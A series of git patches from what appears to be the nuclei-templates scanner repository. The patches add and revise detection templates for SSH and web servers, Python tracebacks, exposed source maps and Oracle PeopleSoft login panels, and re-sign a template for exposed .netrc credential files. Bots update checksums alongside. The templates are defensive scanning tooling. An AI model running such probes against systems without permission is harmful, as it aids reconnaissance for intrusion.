f395be6922dd1b2f5af5880f3aa4b7be24c07191 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sat, 1 Jun 2024 18:58:43 +0000 Subject: [PATCH 1656/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9bc4be6741..41c3f1fada 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -60,6 +60,7 @@ on: - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' + - 'network/detection/bitvise-ssh-detect.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From f2fdb881ce93dedbe029fa99a6a3c66447054c7c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 18:59:44 +0000 Subject: [PATCH 1657/1768] Auto Template Signing [Sat Jun 1 18:59:44 UTC 2024] :robot: --- network/detection/bitvise-ssh-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/network/detection/bitvise-ssh-detect.yaml b/network/detection/bitvise-ssh-detect.yaml index 7ea2c93b37..5b50595cd9 100644 --- a/network/detection/bitvise-ssh-detect.yaml +++ b/network/detection/bitvise-ssh-detect.yaml @@ -31,4 +31,5 @@ tcp: extractors: - type: regex regex: - - "SSH([-0-9.]+) FlowSsh: Bitvise ([A-Z a-z()]+) ([0-9.]+)" \ No newline at end of file + - "SSH([-0-9.]+) FlowSsh: Bitvise ([A-Z a-z()]+) ([0-9.]+)" +# digest: 490a004630440220010abebfd25e29ee77729c67afbab686ff917aed4effa46d5492ba335f0fd58f022021dbdbe86bb9e0f8eed16cb0eafcd7fc2ec05c4be7565d78b90baba7f82af79c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c7d74856677414c29d650e2d503a7e2f7c32b43c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 19:24:11 +0000 Subject: [PATCH 1659/1768] Auto Generated Templates Checksum [Sat Jun 1 19:24:11 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5a562e23b6..4f11fac764 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4714,7 +4714,7 @@ http/exposures/configs/mercurial-hgignore.yaml:e0ff7b4ae41b060b9ddf3ebfed79d2ccb http/exposures/configs/msmtp-config.yaml:c2fe9549d0d0a774612ce7931ee2084a1970c22b http/exposures/configs/nagios-status-page.yaml:657a6f17b303ee8cbb7c3bf51e8fcfbda15101ef http/exposures/configs/netbeans-config.yaml:30c6fc7151841e7effbf1934ecbb3c90b00a47c2 -http/exposures/configs/netrc.yaml:d5243667429965f770b9ad42bb192987bfafa2ba +http/exposures/configs/netrc.yaml:9c3ba171cb5c80b97f38554e6c1840134502c95c http/exposures/configs/nginx-config.yaml:0ed1f3adfa9b5d7b9005d62932cad2b7578f507d http/exposures/configs/opcache-status-exposure.yaml:91cda46fc73949560bf976b71adf8e023d79f188 http/exposures/configs/oracle-cgi-printenv.yaml:de7fe5d906926db35687bd8b5503e35d72c1003f @@ -8466,7 +8466,7 @@ network/detection/apache-activemq-detect.yaml:afd8fba85587220ae91e9120c3f7455529 network/detection/aws-sftp-detect.yaml:4c67b37ede734d66486377b851223abb638d1f78 network/detection/axigen-mail-server-detect.yaml:fbf92b3b9d61df5aaf614b98b570149d62bd96ef network/detection/bgp-detect.yaml:53fc7559679a89a8db2bfb0b44c771fff916d006 -network/detection/bitvise-ssh-detect.yaml:14a18e7829239564ff2fac0ce4cb9ffdc359efd5 +network/detection/bitvise-ssh-detect.yaml:2e69f94f964c1861b3c2c8dd4a155e52c36927cd network/detection/bluecoat-telnet-proxy-detect.yaml:f7509936000eeac439add7b118ee52ac3c0f8725 network/detection/cisco-finger-detect.yaml:12c8c9b4e0504539a5280517e2a0a0039cd9f588 network/detection/clamav-detect.yaml:34ee606515af2f8ab375ce4f602ca5942f8b20a3 @@ -8616,7 +8616,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7b86a5977d267c7708d57cdc968ddbbbbcec9a6f +templates-checksum.txt:8c017f5288707b4e96f39b7690d1fdb6aad5ddb3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e7b61d6662072382eb1e3f2ef6be0576973e2bbf Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 19:25:57 +0000 Subject: [PATCH 1660/1768] Auto Template Signing [Sat Jun 1 19:25:56 UTC 2024] :robot: --- http/exposures/configs/netrc.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/exposures/configs/netrc.yaml b/http/exposures/configs/netrc.yaml index 19e7455e75..46b9a81020 100644 --- a/http/exposures/configs/netrc.yaml +++ b/http/exposures/configs/netrc.yaml @@ -44,5 +44,4 @@ http: part: body regex: - "machine [0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\\.?" - -# digest: 490a00463044022072f3810d5161d773a7e963bf1431f25dc27b0af216a44b5d3ebc90f6bbc4b9f402207701413414bce54d3da7716463e173f5192dfe85efd4dcaa10f91901a398163e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fc3cfa897f3091b3b22fcd0a21ef630ce805b7ef2536295c7029282a2332a5c90221008a14f754783d6f04703bc7d904376759a6de0a9ba3704440ede2d505096cc0bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1aa2382eb15892f640604c95dbc7b3f685c3fe90 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 2 Jun 2024 11:25:21 +0530 Subject: [PATCH 1661/1768] Update and rename cowboy-detect.yaml to http/technologies/cowboy-detect.yaml --- cowboy-detect.yaml => http/technologies/cowboy-detect.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) rename cowboy-detect.yaml => http/technologies/cowboy-detect.yaml (80%) diff --git a/cowboy-detect.yaml b/http/technologies/cowboy-detect.yaml similarity index 80% rename from cowboy-detect.yaml rename to http/technologies/cowboy-detect.yaml index 53a56edff0..2eff270b16 100644 --- a/cowboy-detect.yaml +++ b/http/technologies/cowboy-detect.yaml @@ -8,6 +8,7 @@ info: reference: - https://github.com/ninenines/cowboy metadata: + max-request: 1 verified: true shodan-query: "cowboy" tags: tech,cowboy,detect @@ -15,11 +16,11 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - matchers-condition: and matchers: - type: word + part: header words: - "Server: Cowboy" - part: hea \ No newline at end of file + case-insensitive: true From 54d0eb2d550c01002ab556a20bff017821168f9c Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 2 Jun 2024 06:13:13 +0000 Subject: [PATCH 1662/1768] Auto Generated New Template Addition List [Sun Jun 2 06:13:13 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ff42203707..df882b48cf 100644 --- a/.new-additions +++ b/.new-additions @@ -51,6 +51,7 @@ http/misconfiguration/installer/ubersmith-installer.yaml http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml http/misconfiguration/installer/virtual-smartzone-installer.yaml http/misconfiguration/installer/wowonder-installer.yaml +http/technologies/cowboy-detect.yaml http/technologies/gabia-server-detect.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml From a32b037288b348c6d0b4d60b4e301f5c2a190265 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 2 Jun 2024 06:13:29 +0000 Subject: [PATCH 1663/1768] Auto Generated Templates Checksum [Sun Jun 2 06:13:29 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4f11fac764..ddd2776b49 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4714,7 +4714,7 @@ http/exposures/configs/mercurial-hgignore.yaml:e0ff7b4ae41b060b9ddf3ebfed79d2ccb http/exposures/configs/msmtp-config.yaml:c2fe9549d0d0a774612ce7931ee2084a1970c22b http/exposures/configs/nagios-status-page.yaml:657a6f17b303ee8cbb7c3bf51e8fcfbda15101ef http/exposures/configs/netbeans-config.yaml:30c6fc7151841e7effbf1934ecbb3c90b00a47c2 -http/exposures/configs/netrc.yaml:9c3ba171cb5c80b97f38554e6c1840134502c95c +http/exposures/configs/netrc.yaml:c59cb2322fce014ee30bd8446fab2815f0de548f http/exposures/configs/nginx-config.yaml:0ed1f3adfa9b5d7b9005d62932cad2b7578f507d http/exposures/configs/opcache-status-exposure.yaml:91cda46fc73949560bf976b71adf8e023d79f188 http/exposures/configs/oracle-cgi-printenv.yaml:de7fe5d906926db35687bd8b5503e35d72c1003f @@ -6726,6 +6726,7 @@ http/technologies/coming-soon-page-detect.yaml:11bc0a870298c1a1cf414f677762ccba0 http/technologies/confluence-detect.yaml:a04bc71e42d461e8530902a2a69ae0f187506ff6 http/technologies/connectwise-control-detect.yaml:35b690093c8b71aa317417cd82264891dcbe277e http/technologies/couchbase-sync-gateway.yaml:f2ca1759ea3106b3f21b839b70fc52a23b67fcc3 +http/technologies/cowboy-detect.yaml:c35c9dffcc604d9cea63db82ff86acaf1646b8c0 http/technologies/craft-cms-detect.yaml:b0c7e4f8f830ab3e2f599ee62975557f48a21559 http/technologies/craftercms-detect.yaml:0239600f4a3b22dc74157fc4035819d87936fa74 http/technologies/csrfguard-detect.yaml:7a0e3757762d2336706a42a0e0218391624b96a6 @@ -8616,7 +8617,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8c017f5288707b4e96f39b7690d1fdb6aad5ddb3 +templates-checksum.txt:2570a9df52702c19d290a325cc50de8ab1f69b8a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a2f506bb56a2253ee0f9315b9089b755859ec7f4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 2 Jun 2024 06:14:01 +0000 Subject: [PATCH 1664/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 41c3f1fada..5881440d8e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -56,6 +56,7 @@ on: - 'http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml' - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml' - 'http/misconfiguration/installer/wowonder-installer.yaml' + - 'http/technologies/cowboy-detect.yaml' - 'http/technologies/gabia-server-detect.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' From 902d692314f17d2e717211121f2c67db9aab3368 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 2 Jun 2024 06:15:20 +0000 Subject: [PATCH 1665/1768] Auto Template Signing [Sun Jun 2 06:15:20 UTC 2024] :robot: --- http/technologies/cowboy-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/cowboy-detect.yaml b/http/technologies/cowboy-detect.yaml index 2eff270b16..8e9c23297a 100644 --- a/http/technologies/cowboy-detect.yaml +++ b/http/technologies/cowboy-detect.yaml @@ -24,3 +24,4 @@ requests: words: - "Server: Cowboy" case-insensitive: true +# digest: 4a0a004730450221008a129a8698bf5b5807aaa2bc8701d741edf9931332efa314bb1efd9e3160892002202432136de7b8a35cf37a2a968556d4425de3ace4028a082a20e706c3ea65510a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fb74f6aab26e1427468b9d13e0103e87a5a342d0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 2 Jun 2024 11:54:19 +0530 Subject: [PATCH 1666/1768] Create dont-panic-traceback.yaml --- .../dont-panic-traceback.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/misconfiguration/dont-panic-traceback.yaml diff --git a/http/misconfiguration/dont-panic-traceback.yaml b/http/misconfiguration/dont-panic-traceback.yaml new file mode 100644 index 0000000000..ef9b175207 --- /dev/null +++ b/http/misconfiguration/dont-panic-traceback.yaml @@ -0,0 +1,27 @@ +id: dont-panic-traceback + +info: + name: DON'T PANIC Traceback + author: ritikchaddha + severity: low + description: DON'T PANIC Traceback was detected. + metadata: + max-request: 1 + verified: true + shodan-query: title:"Debugger" + tags: traceback,dont-panic,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: body + words: + - "most recent call last" + - "Traceback" + - "DON'T PANIC" + condition: and + case-insensitive: true From 0e72f047340906cedb024d95d1835c24c54e668e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 2 Jun 2024 12:07:16 +0530 Subject: [PATCH 1667/1768] Fix FN django-variables-exposed.yaml --- http/exposures/configs/django-variables-exposed.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposures/configs/django-variables-exposed.yaml b/http/exposures/configs/django-variables-exposed.yaml index a8ecb5f686..f1a4fd7bf5 100644 --- a/http/exposures/configs/django-variables-exposed.yaml +++ b/http/exposures/configs/django-variables-exposed.yaml @@ -50,5 +50,6 @@ http: - type: status status: - 400 + - 500 # digest: 4a0a0047304502206f3cceff2a49b7e830b5640ef43b674856508c9ef6a1e5a48080f2b377b018c7022100de2304b178a37586efd5bd0556183efdb7088d00c970c09766406c6394fe795e:922c64590222798bb761d5b6d8e72950 From e50ea66551b86069b6716032e45a9d6b83e97719 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO <righettod@users.noreply.github.com> Date: Sun, 2 Jun 2024 10:09:14 +0200 Subject: [PATCH 1668/1768] Update tpl --- .../exposed-panels/oracle-people-sign-in.yaml | 36 +++++++++++-------- 1 file changed, 21 insertions(+), 15 deletions(-) diff --git a/http/exposed-panels/oracle-people-sign-in.yaml b/http/exposed-panels/oracle-people-sign-in.yaml index 54c1e2e1a2..c00ce3f892 100644 --- a/http/exposed-panels/oracle-people-sign-in.yaml +++ b/http/exposed-panels/oracle-people-sign-in.yaml @@ -2,7 +2,7 @@ id: oracle-people-sign-in info: name: Oracle PeopleSoft Login Panel - Detect - author: idealphase + author: idealphase,righettod severity: info description: Oracle PeopleSoft login panel was detected. classification: @@ -11,26 +11,32 @@ info: metadata: max-request: 1 shodan-query: http.title:"Oracle PeopleSoft Sign-in" - tags: oracle,panel + tags: oracle,panel,login,detect http: - method: GET path: - - '{{BaseURL}}' + - '{{BaseURL}}/psp/csprd/?cmd=login&languageCd=ENG&' + - '{{BaseURL}}/psp/retess/?cmd=login&languageCd=ENG&' + - '{{BaseURL}}/psp/fscmprod/?cmd=login&languageCd=ENG&' + - '{{BaseURL}}/psp/CT920/?cmd=login&languageCd=ENG&' + - '{{BaseURL}}/psp/esshrprd/?cmd=login&languageCd=ENG&' + - '{{BaseURL}}/psp/ps/?&cmd=login&languageCd=ENG&' - host-redirects: true + stop-at-first-match: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - - type: word - part: body - words: - - '<title>Oracle PeopleSoft Sign-in' - - 'alt="Oracle PeopleSoft Sign-in" title="Oracle PeopleSoft Sign-in"' - condition: or + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "oracle peoplesoft sign-in", "alt=\"oracle peoplesoft sign-in\" title=\"oracle peoplesoft sign-in\"")' + condition: and - - type: status - status: - - 200 -# digest: 4a0a004730450220534a813cfd286f86aac6bf1ce17b27b6c7b7de5f18eb4b195db1d5ec6a96288f022100b08a023d57ce6c6abb820161ff4ef992d4cd670007e92cdb2d4dc018d01ef3a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)\*\s+Copyright\s+\(c\)\s+([0-9,\s]+)\s+Oracle\s+and\/or\s+its\s+affiliates.' From b910d02b4ac2fbb517e249ef5c9550bbe8949a59 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 2 Jun 2024 10:16:42 +0200 Subject: [PATCH 1669/1768] Add the reference attribute --- http/exposed-panels/oracle-people-sign-in.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/exposed-panels/oracle-people-sign-in.yaml b/http/exposed-panels/oracle-people-sign-in.yaml index c00ce3f892..c8ad56aeb1 100644 --- a/http/exposed-panels/oracle-people-sign-in.yaml +++ b/http/exposed-panels/oracle-people-sign-in.yaml @@ -5,6 +5,8 @@ info: author: idealphase,righettod severity: info description: Oracle PeopleSoft login panel was detected. + reference: + - https://www.oracle.com/applications/peoplesoft/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 From 0e9099b0555d3ecdc31488b42dab89cb1a7e9c59 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 2 Jun 2024 18:04:17 +0530 Subject: [PATCH 1670/1768] fix matcher and format --- ...n-in.yaml => oracle-peoplesoft-panel.yaml} | 27 ++++++++++++------- 1 file changed, 17 insertions(+), 10 deletions(-) rename http/exposed-panels/{oracle-people-sign-in.yaml => oracle-peoplesoft-panel.yaml} (57%) diff --git a/http/exposed-panels/oracle-people-sign-in.yaml b/http/exposed-panels/oracle-peoplesoft-panel.yaml similarity index 57% rename from http/exposed-panels/oracle-people-sign-in.yaml rename to http/exposed-panels/oracle-peoplesoft-panel.yaml index c8ad56aeb1..5058818389 100644 --- a/http/exposed-panels/oracle-people-sign-in.yaml +++ b/http/exposed-panels/oracle-peoplesoft-panel.yaml @@ -1,4 +1,4 @@ -id: oracle-people-sign-in +id: oracle-peoplesoft-panel info: name: Oracle PeopleSoft Login Panel - Detect @@ -11,19 +11,26 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 + verified: true + max-request: 7 shodan-query: http.title:"Oracle PeopleSoft Sign-in" - tags: oracle,panel,login,detect + fofa-query: title="Oracle PeopleSoft Sign-in" + tags: oracle,peoplesoft,panel,login,detect http: - method: GET path: - - '{{BaseURL}}/psp/csprd/?cmd=login&languageCd=ENG&' - - '{{BaseURL}}/psp/retess/?cmd=login&languageCd=ENG&' - - '{{BaseURL}}/psp/fscmprod/?cmd=login&languageCd=ENG&' - - '{{BaseURL}}/psp/CT920/?cmd=login&languageCd=ENG&' - - '{{BaseURL}}/psp/esshrprd/?cmd=login&languageCd=ENG&' - - '{{BaseURL}}/psp/ps/?&cmd=login&languageCd=ENG&' + - '{{BaseURL}}' + - '{{BaseURL}}/{{path}}' + + payloads: + path: + - psp/csprd/?cmd=login&languageCd=ENG& + - psp/retess/?cmd=login&languageCd=ENG& + - psp/fscmprod/?cmd=login&languageCd=ENG& + - psp/CT920/?cmd=login&languageCd=ENG& + - psp/esshrprd/?cmd=login&languageCd=ENG& + - psp/ps/?&cmd=login&languageCd=ENG& stop-at-first-match: true redirects: true @@ -33,7 +40,7 @@ http: - type: dsl dsl: - 'status_code == 200' - - 'contains_any(to_lower(body), "oracle peoplesoft sign-in", "alt=\"oracle peoplesoft sign-in\" title=\"oracle peoplesoft sign-in\"")' + - 'contains_any(to_lower(body), "oracle peoplesoft sign-in", "alt=\"oracle peoplesoft sign-in", "title=\"oracle peoplesoft sign-in")' condition: and extractors: From 6c34afd5b0b661080d30633a6966a9888968d439 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 2 Jun 2024 20:11:40 +0400 Subject: [PATCH 1671/1768] minor changes --- headless/webpack-sourcemap-hunter | 41 ++++++++++++++++++------------- 1 file changed, 24 insertions(+), 17 deletions(-) diff --git a/headless/webpack-sourcemap-hunter b/headless/webpack-sourcemap-hunter index 3ef43a2acd..622ed9e967 100644 --- a/headless/webpack-sourcemap-hunter +++ b/headless/webpack-sourcemap-hunter @@ -1,37 +1,41 @@ -id: Webpack-Sourcemap +id: webpack-sourcemap + info: - name: Webpack-Sourcemap - author: lucky0x0d, PulseSecurity.co.nz + name: Webpack Sourcemap + author: lucky0x0d,PulseSecurity.co.nz + severity: low + description: | + Detects if Webpack source maps are exposed. + impact: | + Exposure of source maps can leak sensitive information about the application's source code and potentially aid attackers in identifying vulnerabilities. + remediation: | + Ensure that Webpack source maps are not exposed to the public by configuring the server to restrict access to them. reference: - https://pulsesecurity.co.nz/articles/javascript-from-sourcemaps - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage - severity: low tags: javascript,webpack,sourcemaps - classification: - cwe-id: CWE-200 - description: parses target to find scripts and then checks for a sourcemapconsumer, inline sourcemaps, if js files have map files, if sourcemap headers exists - metadata: - max-request: 1 headless: - steps: - args: url: "{{BaseURL}}" action: navigate + - action: sleep args: duration: 10 + - action: script name: extract args: code: | - () => { - AAA = []; - window.performance.getEntriesByType("resource").forEach((element) => { if (element.initiatorType === 'script' || element.initiatorType === 'fetch'|| element.initiatorType === 'xmlhttprequest') {AAA.push(element.name)}}); - BBB = [...new Set(Array.from(document.querySelectorAll('script')).map(i => i.src))] - CCC = [...new Set(Array.from(document.querySelectorAll('link[as=script]')).map(i => i.href))] - return [...new Set([...AAA, ...BBB, ...CCC])]; - } + () => { + AAA = []; + window.performance.getEntriesByType("resource").forEach((element) => { if (element.initiatorType === 'script' || element.initiatorType === 'fetch'|| element.initiatorType === 'xmlhttprequest') {AAA.push(element.name)}}); + BBB = [...new Set(Array.from(document.querySelectorAll('script')).map(i => i.src))] + CCC = [...new Set(Array.from(document.querySelectorAll('link[as=script]')).map(i => i.href))] + return [...new Set([...AAA, ...BBB, ...CCC])]; + } extractors: - type: regex @@ -40,7 +44,6 @@ headless: part: extract regex: - (?i)http(.[~a-zA-Z0-9.\/\-_:]+) - flow: | headless(); http("check_base_srcmap_inline"); @@ -148,6 +151,7 @@ http: - '"version":' - '"mappings":' - '"sources":' + - type: status status: - 200 @@ -168,6 +172,7 @@ http: - '"version":' - '"mappings":' - '"sources":' + - type: status status: - 200 @@ -188,6 +193,7 @@ http: - '"version":' - '"mappings":' - '"sources":' + - type: status status: - 200 @@ -208,6 +214,7 @@ http: - '"version":' - '"mappings":' - '"sources":' + - type: status status: - 200 From 8ff3fbc3cb7a3a3972bea39a27fd0f135b106a5d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 2 Jun 2024 20:25:15 +0400 Subject: [PATCH 1672/1768] Rename webpack-sourcemap-hunter to webpack-sourcemap.yaml --- headless/{webpack-sourcemap-hunter => webpack-sourcemap.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename headless/{webpack-sourcemap-hunter => webpack-sourcemap.yaml} (100%) diff --git a/headless/webpack-sourcemap-hunter b/headless/webpack-sourcemap.yaml similarity index 100% rename from headless/webpack-sourcemap-hunter rename to headless/webpack-sourcemap.yaml From 401e48bfa7a06140d557453c8cc11d0575c2bf7b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 2 Jun 2024 16:30:21 +0000 Subject: [PATCH 1673/1768] Auto Generated New Template Addition List [Sun Jun 2 16:30:20 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index df882b48cf..2d7ab1ea48 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +headless/webpack-sourcemap.yaml http/cnvd/2024/CNVD-2024-15077.yaml http/cves/2022/CVE-2022-1580.yaml http/cves/2022/CVE-2022-34534.yaml From c6f5555b5f994531b5e2ad21a23c8c352adf011f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jun 2024 16:30:39 +0000 Subject: [PATCH 1674/1768] Auto Generated Templates Checksum [Sun Jun 2 16:30:39 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ddd2776b49..816dc698ee 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -579,6 +579,7 @@ headless/prototype-pollution-check.yaml:e7e9713474a3f7376073cb23ae5f878973238f65 headless/screenshot.yaml:037205c1a1cb5617d119da0a545d1d6742629ef4 headless/technologies/js-libraries-detect.yaml:5c62ba8ad03afb53da2856ea757fe4fd20694567 headless/technologies/sap-spartacus.yaml:fd0c71b102c08d82bbc848c59b83b92634d13cc6 +headless/webpack-sourcemap.yaml:f4fffc8ef5c82993739161e22481729e26074d16 headless/window-name-domxss.yaml:d56b00173f38f50a27940e5beeaa9499d6cd7c2c helpers/payloads/CVE-2018-25031.js:47b0062436e7afe62fc2f8251a29bb4d443327d2 helpers/payloads/CVE-2020-5776.csv:bb017fe08ae985c23145f7b69aab97cdffbbd8aa @@ -6726,7 +6727,7 @@ http/technologies/coming-soon-page-detect.yaml:11bc0a870298c1a1cf414f677762ccba0 http/technologies/confluence-detect.yaml:a04bc71e42d461e8530902a2a69ae0f187506ff6 http/technologies/connectwise-control-detect.yaml:35b690093c8b71aa317417cd82264891dcbe277e http/technologies/couchbase-sync-gateway.yaml:f2ca1759ea3106b3f21b839b70fc52a23b67fcc3 -http/technologies/cowboy-detect.yaml:c35c9dffcc604d9cea63db82ff86acaf1646b8c0 +http/technologies/cowboy-detect.yaml:b8301635f816554b7cb6774cff657725c9d9956f http/technologies/craft-cms-detect.yaml:b0c7e4f8f830ab3e2f599ee62975557f48a21559 http/technologies/craftercms-detect.yaml:0239600f4a3b22dc74157fc4035819d87936fa74 http/technologies/csrfguard-detect.yaml:7a0e3757762d2336706a42a0e0218391624b96a6 @@ -8617,7 +8618,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2570a9df52702c19d290a325cc50de8ab1f69b8a +templates-checksum.txt:769f3304117aa68254cb99c12bff89cd40d88b3e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3150c67fa5d6687d1be4ec31c04c496c6b75879a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 2 Jun 2024 16:31:00 +0000 Subject: [PATCH 1675/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5881440d8e..e80e54ad36 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'headless/webpack-sourcemap.yaml' - 'http/cnvd/2024/CNVD-2024-15077.yaml' - 'http/cves/2022/CVE-2022-1580.yaml' - 'http/cves/2022/CVE-2022-34534.yaml' From 18ebb4513f3cb69ab79b6882d363eab3ef92650a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jun 2024 16:31:53 +0000 Subject: [PATCH 1677/1768] Auto Generated Templates Checksum [Sun Jun 2 16:31:53 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 816dc698ee..c042eeb76a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4667,7 +4667,7 @@ http/exposures/configs/dbeaver-credentials.yaml:cbd4ab7a04824a87c57dd64ef1c700e5 http/exposures/configs/debug-vars.yaml:0b108f2c2468d3700a7a837b79eec21e3d060785 http/exposures/configs/deployment-ini.yaml:333132cbc8a1874f239fed48f924a70752a4a46e 